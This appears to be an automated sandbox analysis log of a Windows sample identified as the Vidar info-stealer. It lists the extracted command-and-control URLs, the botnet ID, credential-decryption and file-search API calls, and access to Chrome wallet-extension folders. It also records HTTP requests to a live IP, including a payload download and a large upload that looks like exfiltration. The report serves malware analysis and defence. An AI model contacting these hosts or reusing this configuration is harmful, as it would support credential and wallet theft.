Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp |
Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199545993403", "https://t.me/vogogor"], "Botnet": "b2ced91faf30889899f34458f95b8e93", "Version": "5.4"} |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004158A0 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, |
1_2_004158A0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040AA30 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA, |
1_2_0040AA30 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00415600 _memset,lstrlen,CryptStringToBinaryA,_memmove,lstrcat,lstrcat, |
1_2_00415600 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00415820 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, |
1_2_00415820 |
Source: |
Binary string: freebl3.pdb source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr |
Source: |
Binary string: mozglue.pdbP source: mozglue.dll.1.dr |
Source: |
Binary string: freebl3.pdbp source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr |
Source: |
Binary string: nss3.pdb@ source: nss3.dll.1.dr |
Source: |
Binary string: C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe |
Source: |
Binary string: softokn3.pdb@ source: softokn3.dll.1.dr |
Source: |
Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr |
Source: |
Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr |
Source: |
Binary string: 1C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe |
Source: |
Binary string: nss3.pdb source: nss3.dll.1.dr |
Source: |
Binary string: mozglue.pdb source: mozglue.dll.1.dr |
Source: |
Binary string: softokn3.pdb source: softokn3.dll.1.dr |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00412170 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_00412170 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004171C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA, |
1_2_004171C0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00412450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_00412450 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00412690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_00412690 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0041B7E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, |
1_2_0041B7E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040C8E0 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, |
1_2_0040C8E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00424960 FindFirstFileW,FindNextFileW,FindNextFileW, |
1_2_00424960 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004169A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, |
1_2_004169A0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040AAC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_0040AAC0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00416BB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, |
1_2_00416BB0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040DE60 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, |
1_2_0040DE60 |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ |
Source: unknown |
Network traffic detected: HTTP traffic on port 49774 -> 6012 |
Source: unknown |
Network traffic detected: HTTP traffic on port 6012 -> 49774 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49774 -> 6012 |
Source: unknown |
Network traffic detected: HTTP traffic on port 6012 -> 49774 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49774 -> 6012 |
Source: unknown |
Network traffic detected: HTTP traffic on port 6012 -> 49774 |
Source: global traffic |
HTTP traffic detected: GET /vogogor HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: t.me |
Source: global traffic |
HTTP traffic detected: GET /b2ced91faf30889899f34458f95b8e93 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13
Host: 195.201.254.123:6012 |
Source: global traffic |
HTTP traffic detected: GET /sp1.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13
Host: 195.201.254.123:6012
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4389493767942367
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13
Host: 195.201.254.123:6012
Content-Length: 126637
Connection: Keep-Alive
Cache-Control: no-cache |